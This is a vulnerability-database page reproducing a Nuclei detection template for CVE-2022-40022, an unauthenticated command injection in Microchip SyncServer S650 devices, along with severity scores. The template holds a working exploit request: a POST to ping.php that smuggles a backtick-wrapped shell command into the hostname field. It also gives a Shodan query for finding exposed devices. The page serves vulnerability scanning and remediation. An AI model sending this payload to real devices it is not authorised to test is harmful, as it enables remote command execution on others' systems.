Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-40022
HistoryJun 22, 2023 - 5:46 a.m.

Symmetricom SyncServer Unauthenticated - Remote Command Execution

2023-06-2205:46:36
ProjectDiscovery
github.com
65
symmetricom
syncserver
vulnerability
remote command execution
security patches
firmware updates
microchip

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.834

Percentile

98.5%

Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
id: CVE-2022-40022

info:
  name: Symmetricom SyncServer Unauthenticated - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40022
    - https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB
    - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=
    - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40022
    cwe-id: CWE-77
    epss-score: 0.77077
    epss-percentile: 0.98209
    cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: microchip
    product: syncserver_s650
    shodan-query: html:"Symmetricom SyncServer"
  tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip

http:
  - raw:
      - |
        POST /controller/ping.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/controller/ping.php

        currentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+)"

      - type: status
        status:
          - 302
# digest: 4a0a0047304502206895f96e250c4be91711ed2cac3a327d92e20fbf215981d8c9000883a7cb4d4a022100eb905135cf53e657c56d9445973982611b1df000a17e82e05f063125d1b16422:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.834

Percentile

98.5%